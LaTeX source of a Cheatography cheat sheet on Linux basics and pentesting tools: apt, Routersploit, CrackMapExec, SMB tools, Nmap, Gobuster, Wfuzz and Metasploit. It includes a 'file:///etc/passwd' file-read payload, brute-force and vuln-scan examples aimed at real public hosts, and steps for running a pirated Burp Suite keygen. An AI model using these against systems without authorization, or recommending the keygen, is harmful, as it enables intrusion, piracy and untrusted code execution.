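\documentclass[10pt,a4paper]{article}

% One command per line: a % comment runs to the end of the line, so any
% \usepackage or \setlength placed after a comment on the same line is
% never read by LaTeX.

% Packages
\usepackage{fancyhdr} % For header and footer
\usepackage{multicol} % Allows multicols in tables
\usepackage{tabularx} % Intelligent column widths
\usepackage{tabulary} % Used in header and footer
\usepackage{hhline} % Border under tables
\usepackage{graphicx} % For images
\usepackage{xcolor} % For hex colours
%\usepackage[utf8x]{inputenc} % For unicode character support (UTF-8 input is the kernel default since 2018, so this is not needed)
\usepackage[T1]{fontenc} % Without this we get weird character replacements
\usepackage{colortbl} % For coloured tables
\usepackage{setspace} % For line height
\usepackage{lastpage} % Needed for total page number
\usepackage{seqsplit} % Splits long words.
%\usepackage{opensans} % Can't make this work so far. Shame. Would be lovely.
\usepackage[normalem]{ulem} % For underlining links
% Most of the following are not required for the majority
% of cheat sheets but are needed for some symbol support.
\usepackage{amsmath} % Symbols
\usepackage{MnSymbol} % Symbols
\usepackage{wasysym} % Symbols
%\usepackage[english,german,french,spanish,italian]{babel} % Languages

% Document Info
\author{Malware.py (malwaredotpy)}
\pdfinfo{
  /Title (linux-basics-pentesting-tutorials.pdf)
  /Creator (Cheatography)
  /Author (Malware.py (malwaredotpy))
  /Subject (Linux Basics/Pentesting Tutorials Cheat Sheet)
}

% Lengths and widths
\addtolength{\textwidth}{6cm}
\addtolength{\textheight}{-1cm}
\addtolength{\hoffset}{-3cm}
\addtolength{\voffset}{-2cm}
\setlength{\tabcolsep}{0.2cm} % Space between columns
\setlength{\headsep}{-12pt} % Reduce space between header and content
\setlength{\headheight}{85pt} % If less, LaTeX automatically increases it
\renewcommand{\footrulewidth}{0pt} % Remove footer line
\renewcommand{\headrulewidth}{0pt} % Remove header line
\renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit

% These two commands together give roughly
% the right line height in the tables
\renewcommand{\arraystretch}{1.3}
\onehalfspacing

% Commands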
\newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut for row colour \newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols \newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns \newcommand{\tn}{\tabularnewline} % Required as custom column type in use % Font and Colours \definecolor{HeadBackground}{HTML}{333333} \definecolor{FootBackground}{HTML}{666666} \definecolor{TextColor}{HTML}{333333} \definecolor{DarkBackground}{HTML}{A3A3A3} \definecolor{LightBackground}{HTML}{F3F3F3} \renewcommand{\familydefault}{\sfdefault} \color{TextColor} % Header and Footer \pagestyle{fancy} \fancyhead{} % Set header to blank \fancyfoot{} % Set footer to blank \fancyhead[L]{ \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{C} \SetRowColor{DarkBackground} \vspace{-7pt} {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent \hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}} } \end{tabulary} \columnbreak \begin{tabulary}{11cm}{L} \vspace{-2pt}\large{\bf{\textcolor{DarkBackground}{\textrm{Linux Basics/Pentesting Tutorials Cheat Sheet}}}} \\ \normalsize{by \textcolor{DarkBackground}{Malware.py (malwaredotpy)} via \textcolor{DarkBackground}{\uline{cheatography.com/153707/cs/33030/}}} \end{tabulary} \end{multicols}} \fancyfoot[L]{ \footnotesize \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{LL} \SetRowColor{FootBackground} \mymulticolumn{2}{p{5.377cm}}{\bf\textcolor{white}{Cheatographer}} \\ \vspace{-2pt}Malware.py (malwaredotpy) \\ \uline{cheatography.com/malwaredotpy} \\ \end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Cheat Sheet}} \\ \vspace{-2pt}Published 6th July, 2022.\\ Updated 6th July, 2022.\\ Page {\thepage} of \pageref{LastPage}. 
\end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Sponsor}} \\ \SetRowColor{white} \vspace{-5pt} %\includegraphics[width=48px,height=48px]{dave.jpeg} Measure your website readability!\\ www.readability-score.com \end{tabulary} \end{multicols}} \begin{document} \raggedright \raggedcolumns % Set font size to small. Switch to any value % from this page to resize cheat sheet text: % www.emerson.emory.edu/services/latex/latex_169.html \footnotesize % Small font. \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{How to update/upgrade Linux: \newline % Row Count 1 (+ 1) What does APT do? \newline % Row Count 2 (+ 1) APT (Advanced Packaging Tool) is a set of core tools found inside the Debian operating system. It provides utilities for the installation and removal of software packages and dependencies on a system. \newline % Row Count 7 (+ 5) apt is a subset of apt-get and apt-cache commands providing necessary commands for package management. \newline % Row Count 10 (+ 3) while apt-get won't be deprecated, as a regular user, you should start using apt more often. 
\newline % Row Count 12 (+ 2) sudo apt install \newline % Row Count 13 (+ 1) Installs a package \newline % Row Count 14 (+ 1) sudo apt remove \newline % Row Count 15 (+ 1) Removes a package \newline % Row Count 16 (+ 1) sudo apt purge \newline % Row Count 17 (+ 1) Removes package with configuration \newline % Row Count 18 (+ 1) sudo apt update \newline % Row Count 19 (+ 1) Refreshes repository index \newline % Row Count 20 (+ 1) sudo apt upgrade \newline % Row Count 21 (+ 1) Upgrades all upgradable packages \newline % Row Count 22 (+ 1) sudo apt autoremove \newline % Row Count 23 (+ 1) Removes unwanted packages \newline % Row Count 24 (+ 1) sudo apt full-upgrade \newline % Row Count 25 (+ 1) Upgrades packages with auto-handling of dependencies \newline % Row Count 27 (+ 2) sudo apt search \newline % Row Count 28 (+ 1) Searches for a program \newline % Row Count 29 (+ 1) sudo apt show \newline % Row Count 30 (+ 1) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ Shows package details \newline % Row Count 1 (+ 1) sudo apt list \newline % Row Count 2 (+ 1) Lists packages with criteria (installed, upgradable etc) \newline % Row Count 4 (+ 2) sudo apt edit-sources \newline % Row Count 5 (+ 1) edits sources list \newline % Row Count 6 (+ 1) sudo apt clean \newline % Row Count 7 (+ 1) The clean command clears out the local repository of downloaded package files. It removes everything except the partials folder and lock file from \seqsplit{/var/cache/apt/archives/.} Use apt clean to free up disk space when necessary, or as part of regularly scheduled maintenance. \newline % Row Count 13 (+ 6) sudo apt autoclean \newline % Row Count 14 (+ 1) autoclean is another method used to clear out the local repository of downloaded package files, just like clean. 
The difference between clean and autoclean is that the latter only removes package files that can no longer be downloaded from their sources, and are very likely to be useless. \newline % Row Count 20 (+ 6)
sudo apt update \&\& sudo apt upgrade -y \&\& sudo apt full-upgrade -y \&\& sudo apt autoremove -y \newline % Row Count 22 (+ 2)
\seqsplit{===========================================================================================================================} \newline % Row Count 25 (+ 3)
First things to do after installing Linux: \newline % Row Count 26 (+ 1)
1. Download and Install Latest Updates \newline % Row Count 27 (+ 1)
sudo apt update \&\& sudo apt upgrade \newline % Row Count 28 (+ 1)
2. Install GNOME Tweak Tool \newline % Row Count 29 (+ 1)
sudo apt install gnome-tweak-tool \newline % Row Count 30 (+ 1)
} \tn
\end{tabularx}
\par\addvspace{1.3em}
\begin{tabularx}{17.67cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn
\SetRowColor{white}
\mymulticolumn{1}{x{17.67cm}}{3. Install Git \newline % Row Count 1 (+ 1)
sudo apt install git \newline % Row Count 2 (+ 1)
4. Install PIP \newline % Row Count 3 (+ 1)
sudo apt install python3-pip \newline % Row Count 4 (+ 1)
5. Install GNOME Extensions \newline % Row Count 5 (+ 1)
Just go to \seqsplit{https://extensions.gnome.org/} to download and install your preferred extensions. \newline % Row Count 7 (+ 2)
6. Play with a Different Desktop Environment \newline % Row Count 8 (+ 1)
To try MATE, run the following command in Terminal. \newline % Row Count 9 (+ 1)
sudo apt install ubuntu-mate-desktop \newline % Row Count 10 (+ 1)
To try Cinnamon, run the following command in Terminal. \newline % Row Count 12 (+ 2)
sudo apt-get install \seqsplit{cinnamon-desktop-environment} \newline % Row Count 14 (+ 2)
To try KDE, run the following command in Terminal.
\newline % Row Count 15 (+ 1) sudo apt-get install kde-standard \newline % Row Count 16 (+ 1) \seqsplit{===========================================================================================================================} \newline % Row Count 19 (+ 3) How to install a dpkg: \newline % Row Count 20 (+ 1) dpkg is a tool for installing, removing, and querying individual packages. \newline % Row Count 22 (+ 2) dpkg -i \textasciitilde{}/Downloads/file.deb \newline % Row Count 23 (+ 1) \seqsplit{===========================================================================================================================} \newline % Row Count 26 (+ 3) How to fix HTB openvpn connection issue: \newline % Row Count 27 (+ 1) \# vim /etc/sysctl.conf \newline % Row Count 28 (+ 1) Set following to 0: \newline % Row Count 29 (+ 1) \seqsplit{net.ipv6.conf.all.disable\_ipv6} = 0 \newline % Row Count 30 (+ 1) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{\seqsplit{net.ipv6.conf.default.disable\_ipv6} = 0 \newline % Row Count 1 (+ 1) \seqsplit{net.ipv6.conf.lo.disable\_ipv6} = 0 \newline % Row Count 2 (+ 1) \seqsplit{===========================================================================================================================} \newline % Row Count 5 (+ 3) Virtual Machine Network Types: \newline % Row Count 6 (+ 1) Bridge mode: \newline % Row Count 7 (+ 1) This connects the virtual network adapter directly to the physical network \newline % Row Count 9 (+ 2) NAT: \newline % Row Count 10 (+ 1) This allows the virtual network adapter to share the host's IP address \newline % Row Count 12 (+ 2) Host Only: \newline % Row Count 13 (+ 1) This creates a private network that the virtual network adapter shares with the host \newline % Row Count 15 (+ 2) Custom: 
\newline % Row Count 16 (+ 1)
This allows you to create your own virtual network \newline % Row Count 18 (+ 2)
\seqsplit{===========================================================================================================================} \newline % Row Count 21 (+ 3)
Free BurpSuite Pro installation: \newline % Row Count 22 (+ 1)
\seqsplit{ https://ftuapps.dev/burp-suite-professional-edition-v2-0-11-full-all-addons-keygen/} \newline % Row Count 24 (+ 2)
1. Download and Extract \newline % Row Count 25 (+ 1)
2. Run 'BurpSuite Loader \& Keygen' \newline % Row Count 26 (+ 1)
3. Press 'run' in the upper right-hand corner and Burpsuite will load \newline % Row Count 28 (+ 2)
% NOTE(review): the loader/keygen above is an unsigned executable from a non-vendor site; it is untrusted code and a supply-chain risk for the host it runs on.
\seqsplit{===========================================================================================================================} \newline % Row Count 31 (+ 3)
} \tn
\end{tabularx}
\par\addvspace{1.3em}
\begin{tabularx}{17.67cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn
\SetRowColor{white}
\mymulticolumn{1}{x{17.67cm}}{\seqsplit{===========================================================================================================================} \newline % Row Count 3 (+ 3)
How to uncompress with tar: \newline % Row Count 4 (+ 1)
-x = extract \newline % Row Count 5 (+ 1)
-z = gzipped archive \newline % Row Count 6 (+ 1)
-f = get from a file (must be the last option, as it takes the file name) \newline % Row Count 8 (+ 2)
'sudo tar -xzf \seqsplit{utorrent-server-3.0-ubuntu-10.10-27079.tar.gz'} \newline % Row Count 10 (+ 2)
\seqsplit{===========================================================================================================================} \newline % Row Count 13 (+ 3)
Routersploit: \newline % Row Count 14 (+ 1)
Install: \newline % Row Count 15 (+ 1)
sudo apt-get install python-dev python-pip libncurses5-dev git \newline % Row Count 17 (+ 2)
git clone
\seqsplit{https://github.com/reverse-shell/routersploit} \newline % Row Count 19 (+ 2) cd routersploit \newline % Row Count 20 (+ 1) pip install -r requirements.txt \newline % Row Count 21 (+ 1) ./rsf.py \newline % Row Count 22 (+ 1) 1. Exploits, Pick the module(Press Tab Twice to Complete Module): \newline % Row Count 24 (+ 2) exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/ \newline % Row Count 28 (+ 4) rsf \textgreater{} use \seqsplit{exploits/dlink/dir\_300\_600\_rce} \newline % Row Count 29 (+ 1) 2. Creds: \newline % Row Count 30 (+ 1) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ Modules located under creds/ directory allow running dictionary attacks against various network services. 
\newline % Row Count 3 (+ 3)
The following services are currently supported: \newline % Row Count 4 (+ 1)
ftp \newline % Row Count 5 (+ 1)
ssh \newline % Row Count 6 (+ 1)
telnet \newline % Row Count 7 (+ 1)
http basic auth \newline % Row Count 8 (+ 1)
http form auth \newline % Row Count 9 (+ 1)
snmp \newline % Row Count 10 (+ 1)
rsf \textgreater{} use creds/ \newline % Row Count 11 (+ 1)
creds/ftp\_bruteforce \seqsplit{creds/http\_basic\_bruteforce} \seqsplit{creds/http\_form\_bruteforce} creds/snmp\_bruteforce creds/ssh\_default creds/telnet\_default \newline % Row Count 15 (+ 4)
creds/ftp\_default \seqsplit{creds/http\_basic\_default} \seqsplit{creds/http\_form\_default} creds/ssh\_bruteforce creds/telnet\_bruteforce \newline % Row Count 18 (+ 3)
rsf \textgreater{} use creds/ssh\_default \newline % Row Count 19 (+ 1)
rsf (SSH Default Creds) \textgreater{} \newline % Row Count 20 (+ 1)
\seqsplit{===========================================================================================================================} \newline % Row Count 23 (+ 3)
CrackMapExec \newline % Row Count 24 (+ 1)
CrackMapExec (a.k.a.\ CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. Built with stealth in mind, CME follows the concept of "Living off the Land": abusing built-in Active Directory features/protocols to achieve its functionality and allowing it to evade most endpoint protection/IDS/IPS solutions. \newline % Row Count 32 (+ 8)
} \tn
\end{tabularx}
\par\addvspace{1.3em}
\begin{tabularx}{17.67cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn
\SetRowColor{white}
\mymulticolumn{1}{x{17.67cm}}{CME makes heavy use of the Impacket library (developed by @asolino) and the PowerSploit Toolkit (developed by @mattifestation) for working with network protocols and performing a variety of post-exploitation techniques.
\newline % Row Count 5 (+ 5)
Although meant to be used primarily for offensive purposes (e.g.\ red teams), CME can be used by blue teams as well to assess account privileges, find possible misconfigurations and simulate attack scenarios. \newline % Row Count 10 (+ 5)
"crackmapexec smb \textless{}IP\textgreater{}" \newline % Row Count 11 (+ 1)
"crackmapexec smb \textless{}IP\textgreater{} -{}-pass-pol" \newline % Row Count 12 (+ 1)
enumerates the password policy \newline % Row Count 13 (+ 1)
"crackmapexec smb \textless{}IP\textgreater{} -{}-shares -u \textless{}random name\textgreater{} -p \textless{}random name\textgreater{}" \newline % Row Count 15 (+ 2)
\seqsplit{===========================================================================================================================} \newline % Row Count 18 (+ 3)
SmbClient: \newline % Row Count 19 (+ 1)
smbclient is a client that can `talk' to an SMB/CIFS server. It offers an interface similar to that of the ftp program. Operations include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on.
\newline % Row Count 26 (+ 7)
smbclient -L //\textless{}IP\textgreater{} \newline % Row Count 27 (+ 1)
enumerate shares (users) on a server \newline % Row Count 28 (+ 1)
smbclient //\textless{}IP\textgreater{}/\textless{}shares\textgreater{} \newline % Row Count 29 (+ 1)
Mount in the host OS instead of using smbclient: \newline % Row Count 30 (+ 1)
} \tn
\end{tabularx}
\par\addvspace{1.3em}
\begin{tabularx}{17.67cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn
\SetRowColor{white}
\mymulticolumn{1}{x{17.67cm}}{ sudo mkdir /mnt/user \newline % Row Count 1 (+ 1)
sudo mount -t cifs //\textless{}IP\textgreater{}/\textless{}shares\textgreater{} /mnt/\textless{}share\textgreater{} \newline % Row Count 2 (+ 1)
sudo mount -t cifs //10.10.10.178/Data /mnt/Data \newline % Row Count 3 (+ 1)
find . -ls -type f \newline % Row Count 4 (+ 1)
shows files \newline % Row Count 5 (+ 1)
\seqsplit{===========================================================================================================================} \newline % Row Count 8 (+ 3)
SmbMap: \newline % Row Count 9 (+ 1)
SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands. This tool was designed with pen testing in mind, and is intended to simplify searching for potentially sensitive data across large networks. \newline % Row Count 17 (+ 8)
"smbmap -H \textless{}IP\textgreater{}" \newline % Row Count 18 (+ 1)
\seqsplit{===========================================================================================================================} \newline % Row Count 21 (+ 3)
Nmap: \newline % Row Count 22 (+ 1)
Top 13 Nmap command examples: \newline % Row Count 23 (+ 1)
1.
Basic Nmap Scan against IP or host \newline % Row Count 24 (+ 1)
"nmap 1.1.1.1" \newline % Row Count 25 (+ 1)
Now, if you want to scan a hostname, simply replace the IP with the hostname: \newline % Row Count 27 (+ 2)
"nmap cloudflare.com" \newline % Row Count 28 (+ 1)
These kinds of basic scans are perfect for your first steps when starting with Nmap. \newline % Row Count 30 (+ 2)
} \tn
\end{tabularx}
\par\addvspace{1.3em}
\begin{tabularx}{17.67cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn
\SetRowColor{white}
\mymulticolumn{1}{x{17.67cm}}{2. Scan specific ports or scan entire port ranges on a local or remote server \newline % Row Count 2 (+ 2)
nmap -p 1-65535 localhost \newline % Row Count 3 (+ 1)
Nmap is able to scan all possible ports, but you can also scan specific ports, which will report faster results. See below: \newline % Row Count 6 (+ 3)
nmap -p 80,443 8.8.8.8 \newline % Row Count 7 (+ 1)
3. Scan multiple IP addresses \newline % Row Count 8 (+ 1)
nmap 1.1.1.1 8.8.8.8 \newline % Row Count 9 (+ 1)
You can also scan consecutive IP addresses: \newline % Row Count 10 (+ 1)
nmap 1.1.1.1,2,3,4 \newline % Row Count 11 (+ 1)
This will scan 1.1.1.1, 1.1.1.2, 1.1.1.3 and 1.1.1.4. \newline % Row Count 13 (+ 2)
4. Scan IP ranges \newline % Row Count 14 (+ 1)
nmap 8.8.8.0/28 \newline % Row Count 15 (+ 1)
This will scan 14 consecutive IP addresses, from 8.8.8.1 to 8.8.8.14. \newline % Row Count 17 (+ 2)
An alternative is to simply use this kind of range: \newline % Row Count 19 (+ 2)
nmap 8.8.8.1-14 \newline % Row Count 20 (+ 1)
You can even use wildcards to scan the entire class C IP range, for example: \newline % Row Count 22 (+ 2)
nmap 8.8.8.* \newline % Row Count 23 (+ 1)
This will scan 256 IP addresses from 8.8.8.0 to 8.8.8.255.
\newline % Row Count 25 (+ 2)
If you ever need to exclude certain IPs from the IP range scan, you can use the "-{}-exclude" option, as you see below: \newline % Row Count 28 (+ 3)
nmap 8.8.8.* -{}-exclude 8.8.8.1 \newline % Row Count 29 (+ 1)
5. Scan the most popular ports \newline % Row Count 30 (+ 1)
} \tn
\end{tabularx}
\par\addvspace{1.3em}
\begin{tabularx}{17.67cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn
\SetRowColor{white}
\mymulticolumn{1}{x{17.67cm}}{Using the "-{}-top-ports" parameter along with a specific number lets you scan the top X most common ports for that host. \newline % Row Count 3 (+ 3)
"nmap -{}-top-ports 20 192.168.1.106" \newline % Row Count 4 (+ 1)
Replace "20" with the desired number. \newline % Row Count 5 (+ 1)
6. Scan hosts and IP addresses reading from a text file: \newline % Row Count 7 (+ 2)
Let's suppose you create a list.txt file that contains these lines: \newline % Row Count 9 (+ 2)
192.168.1.106 \newline % Row Count 10 (+ 1)
cloudflare.com \newline % Row Count 11 (+ 1)
microsoft.com \newline % Row Count 12 (+ 1)
securitytrails.com \newline % Row Count 13 (+ 1)
The "-iL" parameter lets you read from that file, and scan all those hosts for you: \newline % Row Count 15 (+ 2)
"nmap -iL list.txt" \newline % Row Count 16 (+ 1)
7. Save your Nmap scan results to a file \newline % Row Count 17 (+ 1)
"nmap -oN output.txt securitytrails.com" \newline % Row Count 18 (+ 1)
8. Disabling DNS name resolution \newline % Row Count 19 (+ 1)
If you need to speed up your scans a little bit, you can always choose to disable reverse DNS resolution for all your scans. Just add the "-n" parameter. \newline % Row Count 23 (+ 4)
"nmap -p 80 -n 8.8.8.8" \newline % Row Count 24 (+ 1)
9.
Scan + OS and service detection with fast execution: \newline % Row Count 26 (+ 2) Using the "-A" parameter enables you to perform OS and service detection, and at the same time we are combining this with "-T4" for faster execution. \newline % Row Count 30 (+ 4) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ "nmap -A -T4 cloudflare.com" \newline % Row Count 1 (+ 1) 10. Detect service/daemon versions: \newline % Row Count 2 (+ 1) This can be done by using -sV parameters \newline % Row Count 3 (+ 1) "nmap -sV localhost" \newline % Row Count 4 (+ 1) 11. CVE detection using Nmap: \newline % Row Count 5 (+ 1) One of Nmap's greatest features. If you want to run a full vulnerability test against your target, you can use these parameters: \newline % Row Count 8 (+ 3) "nmap -Pn -{}-script vuln 192.168.1.105" \newline % Row Count 9 (+ 1) 12: FTP brute force attack: \newline % Row Count 10 (+ 1) "nmap -{}-script ftp-brute -p 21 192.168.1.105" \newline % Row Count 11 (+ 1) 13: Scan for MySQL on port 3306 \newline % Row Count 12 (+ 1) "nmap 10.10.10.50 -p 3306" \newline % Row Count 13 (+ 1) \seqsplit{=========================================================================================================} \newline % Row Count 16 (+ 3) How to look up IP Address for a website: \newline % Row Count 17 (+ 1) nslookup www.whateversite.com \newline % Row Count 18 (+ 1) \seqsplit{=========================================================================================================} \newline % Row Count 21 (+ 3) How to pull a file using Burpsuite: \newline % Row Count 22 (+ 1) in a Repeater tab, at the bottom of the request header type: \newline % Row Count 24 (+ 2) \seqsplit{ 'url=file:///etc/passwd'} \newline % Row Count 25 (+ 1) 
\seqsplit{=========================================================================================================} \newline % Row Count 28 (+ 3) \#Gobuster: \newline % Row Count 29 (+ 1) Common Command line options \newline % Row Count 30 (+ 1) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{ -fw – force processing of a domain with wildcard results. \newline % Row Count 2 (+ 2) -np – hide the progress output. \newline % Row Count 3 (+ 1) -m – which mode to use, either dir or dns (default: dir). \newline % Row Count 5 (+ 2) -q – disables banner/underline output. \newline % Row Count 6 (+ 1) -t \newline % Row Count 7 (+ 1) – number of threads to run (default: 10). \newline % Row Count 8 (+ 1) -u – full URL (including scheme), or base domain name. \newline % Row Count 10 (+ 2) -v – verbose output (show all results). \newline % Row Count 11 (+ 1) -w – path to the wordlist used for brute forcing (use – for stdin). \newline % Row Count 13 (+ 2) Command line options for dns mode \newline % Row Count 14 (+ 1) -cn – show CNAME records (cannot be used with '-i' option). \newline % Row Count 16 (+ 2) -i – show all IP addresses for the result. \newline % Row Count 17 (+ 1) Command line options for dir mode \newline % Row Count 18 (+ 1) -a \textless{}user agent string\textgreater{} – specify a user agent string to send in the request header. \newline % Row Count 20 (+ 2) -c \textless{}http cookies\textgreater{} – use this to specify any cookies that you might need (simulating auth). \newline % Row Count 22 (+ 2) -e – specify extended mode that renders the full URL. \newline % Row Count 24 (+ 2) -f – append / for directory brute forces. \newline % Row Count 25 (+ 1) -k – Skip verification of SSL certificates. 
\newline % Row Count 26 (+ 1)
-l – show the length of the response. \newline % Row Count 27 (+ 1)
-n – "no status" mode, disables the output of the result's status code. \newline % Row Count 29 (+ 2)
-o \textless{}file\textgreater{} – specify a file name to write the output to. \newline % Row Count 31 (+ 2)
} \tn
\end{tabularx}
\par\addvspace{1.3em}
\begin{tabularx}{17.67cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn
\SetRowColor{white}
\mymulticolumn{1}{x{17.67cm}}{ -p \textless{}proxy url\textgreater{} – specify a proxy to use for all requests (scheme must match the URL scheme). \newline % Row Count 2 (+ 2)
-r – follow redirects. \newline % Row Count 3 (+ 1)
-s \textless{}status codes\textgreater{} – comma-separated list of status codes to be deemed a "positive" (default: 200,204,301,302,307). \newline % Row Count 6 (+ 3)
-x \textless{}extensions\textgreater{} – list of extensions to check for, if any. \newline % Row Count 8 (+ 2)
-P \textless{}password\textgreater{} – HTTP Authorization password (Basic Auth only, prompted if missing). \newline % Row Count 10 (+ 2)
-U \textless{}username\textgreater{} – HTTP Authorization username (Basic Auth only). \newline % Row Count 12 (+ 2)
-to \textless{}timeout\textgreater{} – HTTP timeout. Examples: 10s, 100ms, 1m (default: 10s).
\newline % Row Count 14 (+ 2) "gobuster dir -w \seqsplit{/usr/share/wordlists/dirbuster/directory-list-lowercase-2}.3-medium.txt -u https://10.10.10.84" \newline % Row Count 17 (+ 3) gobuster vhost -w \seqsplit{/opt/SecLists/Discovery/DNS/subdomains-top1million}.txt -u http://forwardslash.htb \newline % Row Count 20 (+ 3) \seqsplit{===========================================================================================================================} \newline % Row Count 23 (+ 3) Nikto: \newline % Row Count 24 (+ 1) It enables you to get insights about the host IP address, operating system detection and other network security details that are important during penetration testing. \newline % Row Count 28 (+ 4) perl nikto.pl -host 209.17.116.7 -useragent bob \newline % Row Count 29 (+ 1) \seqsplit{===========================================================================================================================} \newline % Row Count 32 (+ 3) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{\#Wfuzz: \newline % Row Count 1 (+ 1) Wfuzz can be used to look for hidden content, such as files and directories, within a web server, allowing to find further attack vectors. It is worth noting that, the success of this task depends highly on the dictionaries used. 
\newline % Row Count 6 (+ 5) Wfuzz looking for common directories: \newline % Row Count 7 (+ 1) "wfuzz -w \seqsplit{wordlist/general/common.txt} http://testphp.vulnweb.com/FUZZ" \newline % Row Count 9 (+ 2) Wfuzz looking for common files: \newline % Row Count 10 (+ 1) "wfuzz -w \seqsplit{wordlist/general/common.txt} \textless{}site\textgreater{}/FUZZ.php" \newline % Row Count 12 (+ 2) You often want to fuzz some sort of data in the URL's query string, this can be achieved by specifying the FUZZ keyword in the URL after a question mark: \newline % Row Count 16 (+ 4) "wfuzz -z range,0-10 -{}-hl 97 \seqsplit{http://testphp.vulnweb.com/listproducts.php?cat=FUZZ"} \newline % Row Count 18 (+ 2) \seqsplit{===========================================================================================================================} \newline % Row Count 21 (+ 3) Setting up Metasploit: \newline % Row Count 22 (+ 1) systemctl start postgresql \newline % Row Count 23 (+ 1) msfdb init \newline % Row Count 24 (+ 1) db\_status \newline % Row Count 25 (+ 1) Metasploit Pro: \newline % Row Count 26 (+ 1) https://localhost:3790/ \newline % Row Count 27 (+ 1) \seqsplit{===========================================================================================================================} \newline % Row Count 30 (+ 3) } \tn \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{17.67cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{17.67cm}}{\bf\textcolor{white}{linux basics and easy pentesting tutorials (cont)}} \tn \SetRowColor{white} \mymulticolumn{1}{x{17.67cm}}{Meterpreter Commands: \newline % Row Count 1 (+ 1) Core Commands \newline % Row Count 2 (+ 1) ============= \newline % Row Count 3 (+ 1) Command Description \newline % Row Count 4 (+ 1) -{}-{}-{}-{}-{}-{}- -{}-{}-{}-{}-{}-{}-{}-{}-{}-- \newline % Row Count 5 (+ 1) ? 
